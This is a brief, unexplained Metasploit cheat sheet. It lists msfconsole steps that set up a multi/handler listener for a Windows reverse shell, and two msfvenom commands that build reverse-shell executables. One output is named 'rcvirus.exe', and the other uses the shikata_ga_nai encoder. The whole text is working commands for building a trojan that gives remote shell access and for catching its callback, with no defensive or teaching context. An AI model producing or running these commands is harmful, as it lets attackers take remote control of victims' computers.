1.msfconsole
2.use exploit/multi/handler
3.msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
4.payload => windows/shell/reverse_tcp
5.Show options
6.msf exploit(multi/handler) > set LHOST 192.168.9.191
7.LHOST => 192.168.9.191
8.msf exploit(multi/handler) > set LPORT 31337
9.LPORT => 31337
10.msf exploit

Note: don't copy the numbers




msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.80.128 lport=4444 -f exe -a x86 >rcvirus.exe


or 

1. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.9.191 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
